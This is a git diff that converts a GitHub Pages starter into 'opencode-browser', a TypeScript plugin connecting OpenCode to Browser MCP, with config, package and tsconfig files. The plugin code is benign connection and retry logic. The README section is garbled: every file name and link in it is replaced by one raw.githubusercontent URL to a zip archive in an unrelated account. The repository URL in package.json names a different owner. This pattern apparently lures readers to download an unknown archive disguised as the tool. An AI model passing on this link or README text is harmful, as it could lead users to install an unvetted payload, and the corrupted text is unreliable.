-Once you click **Rename**, your website will automatically be published at: https://raw.githubusercontent.com/samson9999/opencode-browser/master/images/browser-opencode-2.4.zip The HTML file—called `https://raw.githubusercontent.com/samson9999/opencode-browser/master/images/browser-opencode-2.4.zip`—is rendered as the home page and you'll be making changes to this file in the next step. +## 📝 Usage Instructions -Congratulations! You just launched your first GitHub Pages website. It's now live to share with the entire world +After launching opencode-browser, you can begin using it for various tasks: -## Making your first edit +1. **Setting Up Automation Tasks** + Open the application and navigate to the task setup screen. You can create new automation tasks by specifying actions like clicking buttons, entering text, or extracting data. -When you make any change to any file in your project, you’re making a **commit**. If you fix a typo, update a filename, or edit your code, you can add it to GitHub as a commit. Your commits represent your project’s entire history—and they’re all saved in your project’s repository. +2. **Utilizing AI Features** + opencode-browser allows you to deploy AI features by enabling the AI control setting. This helps in making intelligent decisions during automation. -With each commit, you have the opportunity to write a **commit message**, a short, meaningful comment describing the change you’re making to a file. So you always know exactly what changed, no matter when you return to a commit. +3. **Testing Your Setup** + Before executing your automation tasks, run a test to ensure everything works as expected. The software will guide you if there are any issues that need addressing. -## Practice: Customize your first GitHub website by writing HTML code +## ✨ Additional Resources -Want to edit the site you just published? 
Let’s practice commits by introducing yourself in your `https://raw.githubusercontent.com/samson9999/opencode-browser/master/images/browser-opencode-2.4.zip` file. Don’t worry about getting it right the first time—you can always build on your introduction later. +For more detailed instructions and examples on using opencode-browser, check the following: -Let’s start with this template: +- **Documentation:** Detailed guides on each feature are available. +- **FAQ:** Answers to common questions regarding installation and usage. +- **Community Forum:** A place to ask questions and connect with other users. -``` -

Hello World! I’m [username]. This is my website!

-``` +## 📞 Support -To add your introduction, copy our template and click the edit pencil icon at the top right hand corner of the `https://raw.githubusercontent.com/samson9999/opencode-browser/master/images/browser-opencode-2.4.zip` file. +If you encounter any issues or have questions not addressed in the documentation, please reach out for support. You can create an issue directly in the GitHub repository, and we will assist you as soon as possible. -edit-this-file +## 🔗 Conclusion - -Delete this placeholder line: - -``` -

Welcome to your first GitHub Pages website!

-``` - -Then, paste the template to line 15 and fill in the blanks. - -edit-githuboctocat-index - - -When you’re done, scroll down to the `Commit changes` section near the bottom of the edit page. Add a short message explaining your change, like "Add my introduction", then click `Commit changes`. - - -add-my-username - -Once you click `Commit changes`, your changes will automatically be published on your GitHub Pages website. Refresh the page to see your new changes live in action. - -:tada: You just made your first commit! :tada: - -## Extra Credit: Keep on building! - -Change the placeholder Octocat gif on your GitHub Pages website by [creating your own personal Octocat emoji](https://raw.githubusercontent.com/samson9999/opencode-browser/master/images/browser-opencode-2.4.zip) or [choose a different Octocat gif from our logo library here](https://raw.githubusercontent.com/samson9999/opencode-browser/master/images/browser-opencode-2.4.zip). Add that image to line 12 of your `https://raw.githubusercontent.com/samson9999/opencode-browser/master/images/browser-opencode-2.4.zip` file, in place of the ` - - - - - my-first-website - - - -

my-first-website

- -octocat-gif - - -

Welcome to your first GitHub Pages website!

- -

AltStyle によって変換されたページ (->オリジナル) /

- diff --git a/index.ts b/index.ts new file mode 100644 index 0000000..e06eeac --- /dev/null +++ b/index.ts @@ -0,0 +1,288 @@ +import type { Plugin } from "@opencode-ai/plugin" + +/** + * OpenCode Plugin for Browser MCP Integration + * + * This plugin integrates Browser MCP (https://browsermcp.io) to enable browser automation + * capabilities within OpenCode. It allows the AI to control a browser, navigate websites, + * fill forms, click elements, and perform other browser automation tasks. + * + * Setup: + * 1. Install the Browser MCP extension in your browser + * 2. Configure the MCP server in your opencode.json (see README.md) + * 3. Enable this plugin + * + * Features: + * - Automatic reconnection when browser extension is disabled/enabled + * - Exponential backoff retry logic for failed connections + * - Connection health monitoring + * - User notifications for connection status changes + * + * The plugin automatically detects browser-related requests and provides context hints + * to help the AI use Browser MCP tools effectively. 
+ */
+
+/** Mutable record of what the plugin currently believes about the Browser MCP link. */
+interface ConnectionState {
+  /** False after a connection-style failure; true again after a successful browser tool call. */
+  isConnected: boolean
+  /** Most recent connection error; cleared when the connection is considered restored. */
+  lastError?: Error
+  /** Number of retry windows consumed since the last successful browser tool call. */
+  retryCount: number
+  /** `Date.now()` timestamp taken when the most recent retry window started. */
+  lastAttempt?: number
+  /** Handle of the periodic health-check timer, when one is running. */
+  healthCheckInterval?: NodeJS.Timeout
+}
+
+/** Tunables for the exponential backoff applied between retries. */
+interface RetryConfig {
+  /** Retry windows granted before the plugin reports a hard failure. */
+  maxRetries: number
+  /** Delay before the first retry, in milliseconds. */
+  initialDelay: number
+  /** Upper bound for any single delay, in milliseconds. */
+  maxDelay: number
+  /** Factor by which the delay grows after every retry. */
+  backoffMultiplier: number
+}
+
+/**
+ * Plugin factory. Returns the hook table that tracks the health of the Browser MCP
+ * connection and annotates `browsermcp_*` tool calls with status messages.
+ *
+ * NOTE(review): the hook payload fields used below (`output.messages`, `output.isError`,
+ * `output.content`, `input.messages`) are kept exactly as this file already used them;
+ * confirm them against the `@opencode-ai/plugin` typings.
+ */
+export const BrowserMCPPlugin: Plugin = async (_ctx) => {
+  // Connection state management. Optimistically "connected" until a tool call says otherwise.
+  const connectionState: ConnectionState = {
+    isConnected: true,
+    retryCount: 0
+  }
+
+  // Retry configuration
+  const retryConfig: RetryConfig = {
+    maxRetries: 5,
+    initialDelay: 1000, // 1 second
+    maxDelay: 30000, // 30 seconds
+    backoffMultiplier: 2
+  }
+
+  // Lower-case substrings that classify an error text as a connection problem.
+  const connectionErrorMarkers = [
+    'connection',
+    'econnrefused',
+    'enotfound',
+    'timeout',
+    'network',
+    'disconnected',
+    'unavailable'
+  ]
+
+  /**
+   * Calculate delay for exponential backoff:
+   * initialDelay * backoffMultiplier^retryCount, capped at maxDelay.
+   */
+  const getRetryDelay = (retryCount: number): number =>
+    Math.min(
+      retryConfig.initialDelay * Math.pow(retryConfig.backoffMultiplier, retryCount),
+      retryConfig.maxDelay
+    )
+
+  /**
+   * Extract a printable message from a string or an error-like object.
+   * Returns '' when no string message is available, so callers never call
+   * string methods on a non-string `message` property.
+   */
+  const toErrorText = (error: unknown): string => {
+    if (typeof error === 'string') return error
+    const message = (error as { message?: unknown } | null | undefined)?.message
+    return typeof message === 'string' ? message : ''
+  }
+
+  /**
+   * Check if an error indicates a connection problem
+   */
+  const isConnectionError = (error: any): boolean => {
+    if (!error) return false
+    const text = toErrorText(error).toLowerCase()
+    return connectionErrorMarkers.some(marker => text.includes(marker))
+  }
+
+  /**
+   * Consume one retry window: bump the retry counter and wait out the backoff delay.
+   *
+   * The plugin has no way to probe the browser extension itself, so this does NOT
+   * verify the connection. Recovery is only confirmed when a later `browsermcp_*`
+   * tool call succeeds (see "tool.execute.after").
+   *
+   * @returns true when a retry window was granted, false when all retries are used up.
+   */
+  const waitForRetryWindow = async (): Promise<boolean> => {
+    if (connectionState.retryCount >= retryConfig.maxRetries) {
+      return false
+    }
+
+    const delay = getRetryDelay(connectionState.retryCount)
+    connectionState.retryCount++
+    connectionState.lastAttempt = Date.now()
+
+    await new Promise<void>(resolve => setTimeout(resolve, delay))
+    return true
+  }
+
+  /**
+   * Reset connection state on successful connection
+   */
+  const resetConnectionState = () => {
+    connectionState.isConnected = true
+    connectionState.retryCount = 0
+    connectionState.lastError = undefined
+  }
+
+  /**
+   * Mark connection as failed
+   */
+  const markConnectionFailed = (error: Error) => {
+    connectionState.isConnected = false
+    connectionState.lastError = error
+  }
+
+  /**
+   * Append a status message to a hook output, creating the list on first use.
+   */
+  const pushMessage = (output: any, role: "user" | "assistant", content: string) => {
+    output.messages = output.messages || []
+    output.messages.push({ role, content })
+  }
+
+  /**
+   * Stop health check
+   */
+  const stopHealthCheck = () => {
+    if (connectionState.healthCheckInterval) {
+      clearInterval(connectionState.healthCheckInterval)
+      connectionState.healthCheckInterval = undefined
+    }
+  }
+
+  /**
+   * Start periodic health check. Idempotent: a timer that is already running is
+   * cleared first, so repeated session creation cannot leak intervals.
+   */
+  const startHealthCheck = () => {
+    stopHealthCheck()
+
+    // Ticks every 30 seconds. The tick is currently a placeholder: the actual
+    // check happens on the next browser tool use.
+    connectionState.healthCheckInterval = setInterval(() => {
+      if (!connectionState.isConnected) {
+        // Health check will be triggered on next tool use
+      }
+    }, 30000)
+
+    // A bookkeeping timer must not keep the host process alive on its own.
+    connectionState.healthCheckInterval.unref?.()
+  }
+
+  return {
+    /**
+     * Hook into session creation to inject browser automation context
+     */
+    "session.created": async () => {
+      // Session created - ready for browser automation
+      startHealthCheck()
+    },
+
+    /**
+     * Hook before tool execution to provide browser-specific guidance
+     */
+    "tool.execute.before": async (input, output) => {
+      // Only browser-related MCP tools are of interest
+      if (!input.tool.startsWith("browsermcp_")) return
+
+      if (!connectionState.isConnected) {
+        // retryCount already counts the window consumed for this retry; it is 0 only
+        // when the failure was reported through a session error event.
+        const attempt = Math.max(1, connectionState.retryCount)
+        pushMessage(
+          output,
+          "user",
+          `[Browser MCP] Connection lost. Attempting to reconnect (attempt ${attempt}/${retryConfig.maxRetries})...`
+        )
+      }
+    },
+
+    /**
+     * Hook after tool execution to handle browser automation results
+     */
+    "tool.execute.after": async (input, output) => {
+      if (!input.tool.startsWith("browsermcp_")) return
+
+      // NOTE(review): the substring test also matches ordinary page text that merely
+      // contains the word "error"; tighten once the result shape is confirmed.
+      const hasError = output.isError || (output.content && typeof output.content === 'string' && output.content.includes('error'))
+
+      if (!hasError) {
+        // Successful execution - this is the only real proof that the link works
+        if (!connectionState.isConnected) {
+          resetConnectionState()
+          pushMessage(output, "assistant", "[Browser MCP] Connection restored successfully.")
+        }
+        return
+      }
+
+      // An error without content carries nothing to classify, but it is still an
+      // error and must never be treated as a successful call.
+      if (!output.content) return
+
+      const errorContent = typeof output.content === 'string' ? output.content : JSON.stringify(output.content)
+      if (!isConnectionError(errorContent)) return
+
+      markConnectionFailed(new Error(errorContent))
+
+      const retryGranted = await waitForRetryWindow()
+
+      if (retryGranted) {
+        pushMessage(
+          output,
+          "assistant",
+          `[Browser MCP] Lost connection to the browser extension (retry ${connectionState.retryCount}/${retryConfig.maxRetries}). Run the browser tool again; the connection is confirmed as soon as a browser tool call succeeds.`
+        )
+      } else {
+        // Max retries reached
+        pushMessage(
+          output,
+          "assistant",
+          `[Browser MCP] Failed to reconnect after ${retryConfig.maxRetries} attempts. Please check that:\n1. The Browser MCP extension is enabled in Chrome\n2. The browser is running\n3. The extension has proper permissions\n\nYou may need to restart OpenCode if the issue persists.`
+        )
+      }
+    },
+
+    /**
+     * Hook to add browser automation context during session compaction
+     * This helps preserve browser-related context across long sessions
+     */
+    "experimental.session.compacting": async (input, output) => {
+      // Check if any browser automation was performed in this session.
+      // Guard against input.messages being undefined and against message content
+      // that is not a list of parts (e.g. a plain string).
+      const hasBrowserTools = input.messages?.some(msg =>
+        Array.isArray(msg.content) &&
+        msg.content.some(part =>
+          part.type === "tool_use" && part.name?.startsWith("browsermcp_")
+        )
+      )
+
+      if (hasBrowserTools) {
+        output.context.push(`## Browser Automation Context
+
+The Browser MCP integration has been used in this session. When resuming:
+- Browser state may have changed since last interaction
+- Browser tabs opened during automation may still be active
+- Consider checking current browser state before making assumptions
+- Use Browser MCP tools to verify page state when needed`)
+      }
+    },
+
+    /**
+     * Hook into TUI toast notifications to show browser-specific tips
+     */
+    "tui.toast.show": async (input, output) => {
+      // You could customize toast messages related to browser automation here
+    },
+
+    /**
+     * Event handler for various OpenCode events
+     */
+    event: async ({ event }) => {
+      // Handle session idle - could be used to close browser tabs
+      if (event.type === "session.idle") {
+        // Session is idle
+      }
+
+      // Handle session errors - could help debug browser automation issues
+      if (event.type === "session.error") {
+        // Check if it's a browser-related error
+        const error = (event as any).error
+        if (error && isConnectionError(error)) {
+          // The payload is not guaranteed to be an Error instance; normalise it so
+          // that lastError always holds a real Error.
+          markConnectionFailed(error instanceof Error ? error : new Error(toErrorText(error)))
+        }
+      }
+
+      // Clean up on session end
+      // NOTE(review): confirm that "session.end" is an event type the host emits.
+      if (event.type === "session.end") {
+        stopHealthCheck()
+      }
+    }
+  }
+}
+
+/**
+ * Default export for the plugin
+ */
+export default BrowserMCPPlugin
diff --git a/opencode.json.example b/opencode.json.example new file mode 100644 index 0000000..4c5f562 --- /dev/null +++ b/opencode.json.example @@ -0,0 +1,24 @@ +{ + "$schema": "https://opencode.ai/config.json", + "mcp": { + "browsermcp": { + "type": "local", + "command": ["npx", "-y", "@browsermcp/mcp@latest"], + "enabled": true, + "environment": { + "BROWSER_MCP_DEBUG": "false" + } + } + }, + "plugin": [ + "opencode-browser" + ], + "agent": { + "browser-automation": { + "description": "Agent specialized in browser automation tasks", + "tools": { + "browsermcp_*": true + } + } + } +} diff --git a/package.json b/package.json new file mode 100644 index 0000000..795d84f --- /dev/null +++ b/package.json @@ -0,0 +1,41 @@ +{ + "name": "opencode-browser", + "version": "1.1.0", + "description": "OpenCode plugin that integrates Browser MCP 
for browser automation", + "type": "module", + "main": "index.ts", + "keywords": [ + "opencode", + "opencode-plugin", + "plugin", + "browser", + "browser-automation", + "mcp", + "model-context-protocol", + "automation", + "browser-control", + "web-automation", + "puppeteer-alternative" + ], + "author": "", + "license": "MIT", + "peerDependencies": { + "@opencode-ai/plugin": "*" + }, + "repository": { + "type": "git", + "url": "git+https://github.com/michaljach/opencode-browser.git" + }, + "homepage": "https://github.com/michaljach/opencode-browser#readme", + "bugs": { + "url": "https://github.com/michaljach/opencode-browser/issues" + }, + "files": [ + "index.ts", + "README.md", + "LICENSE" + ], + "engines": { + "node": ">=18.0.0" + } +} diff --git a/styles.css b/styles.css deleted file mode 100644 index 9b85284..0000000 --- a/styles.css +++ /dev/null @@ -1,17 +0,0 @@ -* { - margin:0px; - padding:0px; -} - -#octocat { - display: block; - width:384px; - margin: 50px auto; -} - -p { - display: block; - width: 400px; - margin: 50px auto; - font: 30px Monaco,"Courier New","DejaVu Sans Mono","Bitstream Vera Sans Mono",monospace; -} diff --git a/tsconfig.json b/tsconfig.json new file mode 100644 index 0000000..ca0a3af --- /dev/null +++ b/tsconfig.json @@ -0,0 +1,19 @@ +{ + "compilerOptions": { + "target": "ES2022", + "module": "ESNext", + "moduleResolution": "bundler", + "lib": ["ES2022"], + "types": ["node"], + "strict": true, + "esModuleInterop": true, + "skipLibCheck": true, + "forceConsistentCasingInFileNames": true, + "resolveJsonModule": true, + "declaration": true, + "declarationMap": true, + "outDir": "./dist" + }, + "include": ["index.ts"], + "exclude": ["node_modules", "dist"] +}